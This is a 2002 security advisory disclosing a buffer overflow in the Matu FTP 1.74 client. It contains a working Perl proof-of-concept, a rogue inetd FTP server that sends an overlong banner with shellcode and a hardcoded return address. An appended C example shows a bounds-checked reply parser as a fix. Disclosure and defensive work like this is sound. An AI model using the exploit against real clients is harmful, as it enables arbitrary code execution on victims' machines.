From: Kanatoko (anviljumperz.net)
Date: Mon Apr 22 2002 - 04:45:46 CDT


    Matu FTP remote buffer overflow vulnerability

    /*---------------------------
     Description
    ---------------------------*/
    Matu FTP is a Japanese FTP client for the Win32 platform.
    We found an exploitable buffer overflow problem in Matu FTP Version 1.74.
    The buffer overflow occurs when a long string like

    220 AAAAAAAAAAAAAAAAA.....AAAAAAAAAAAAAAA<CR><LF>

    is received by Matu FTP at the beginning of an FTP session.
    This vulnerability allows a malicious FTP server to execute
    arbitrary code on client hosts.

    /*---------------------------
     Vendor Status
    ---------------------------*/
    Notified with no response

    /*---------------------------
     POC
    ---------------------------*/
    This exploit code is invoked as an FTP server through inetd.

    #!/usr/local/bin/perl

    #------------------------------------------------------
    # Matu Ftp Version 1.74 exploit for Windows2000 Professional (SP2)
    # ( run under inetd )
    # written by Kanatoko <anviljumperz.net>
    # http://www.jumperz.net/
    #------------------------------------------------------
    $|=1;   # autoflush STDOUT so the banner is sent as soon as inetd connects us

    # egg written by UNYUN (http://www.shadowpenguin.org/)
    $egg = "\xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2";
    $egg .= "\x0B\x03\xF2\x88\x0E\x2B\xF2\xB8\xAF\xA7";
    $egg .= "\xE6\x77\xB1\x05\xB2\x04\x2B\xE2\x89\x0C";
    $egg .= "\x24\x2B\xE2\x89\x34\x24\xFF\xD0\x90\xEB";
    $egg .= "\xFD\xE8\xD4\xFF\xFF\xFF";
    $egg .= "notepad.exe";                # program name the egg passes along

    # egg_address = 0x0012F43C (stack address of the egg on Win2000 Pro SP2)
    $buf = "\x90" x 217;                  # NOP sled
    $buf .= $egg;
    $buf .= "A" x 2;                      # padding up to the saved return address
    $buf .= "\x3C\xF4\x12\x00";           # egg_address, little-endian
    $buf .= "B" x 80;                     # trailing filler

    # the overlong 220 greeting that triggers the overflow in the client
    print "220 $buf\r\n";

    --
    

    #sorry for the bad english

    Kanatoko <anviljumperz.net> http://www.jumperz.net/(Japanese)
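As an added example (not part of the advisory and not Matu FTP's code), the kind of bounds-checked reply-line parser that would have refused the banner above: it rejects any reply line with no CRLF inside a fixed cap instead of copying it into a buffer. The cap value, the status names and the constructed test banner are assumptions made here.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

/* Constructed assumption: the client's cap on one reply line, CRLF included.
 * It must never exceed the buffer the client copies the line into. */
#define FTP_MAX_REPLY_LINE 256

enum ftp_reply_status {
    FTP_REPLY_OK = 0,
    FTP_REPLY_INCOMPLETE,  /* no CRLF yet; wait for more data */
    FTP_REPLY_TOO_LONG,    /* no CRLF within the cap, or out[] too small: refuse, never truncate */
    FTP_REPLY_MALFORMED    /* does not start with a 3-digit reply code */
};

/* Parse one reply line from the first `len` bytes of `in`. On FTP_REPLY_OK the
 * text without CRLF is copied NUL-terminated into out[outcap], the 3-digit code
 * is stored in *code and *consumed is the number of input bytes used. */
enum ftp_reply_status ftp_parse_reply_line(const char *in, size_t len,
                                           char *out, size_t outcap,
                                           int *code, size_t *consumed)
{
    size_t limit = len < FTP_MAX_REPLY_LINE ? len : FTP_MAX_REPLY_LINE;
    size_t i = 0;
    while (i + 1 < limit && !(in[i] == '\r' && in[i + 1] == '\n'))
        i++;
    if (i + 1 >= limit)               /* no CRLF inside the window */
        return len >= FTP_MAX_REPLY_LINE ? FTP_REPLY_TOO_LONG : FTP_REPLY_INCOMPLETE;
    if (i >= outcap)                  /* leave room for the terminating NUL */
        return FTP_REPLY_TOO_LONG;
    if (i < 3 || !isdigit((unsigned char)in[0]) || !isdigit((unsigned char)in[1])
        || !isdigit((unsigned char)in[2]) || (i > 3 && in[3] != ' ' && in[3] != '-'))
        return FTP_REPLY_MALFORMED;
    memcpy(out, in, i);
    out[i] = '\0';
    *code = (in[0] - '0') * 100 + (in[1] - '0') * 10 + (in[2] - '0');
    *consumed = i + 2;
    return FTP_REPLY_OK;
}

/* Constructed input: a banner shaped like the PoC above ("220 " followed by
 * 217 + 57 + 2 + 4 + 80 = 360 payload bytes and CRLF), fed through the parser. */
enum ftp_reply_status demo_poc_shaped_banner(void)
{
    char banner[4 + 360 + 2], out[FTP_MAX_REPLY_LINE];
    int code = 0; size_t used = 0;
    memcpy(banner, "220 ", 4);
    memset(banner + 4, 'A', 360);
    memcpy(banner + 4 + 360, "\r\n", 2);
    return ftp_parse_reply_line(banner, sizeof banner, out, sizeof out, &code, &used);
}
```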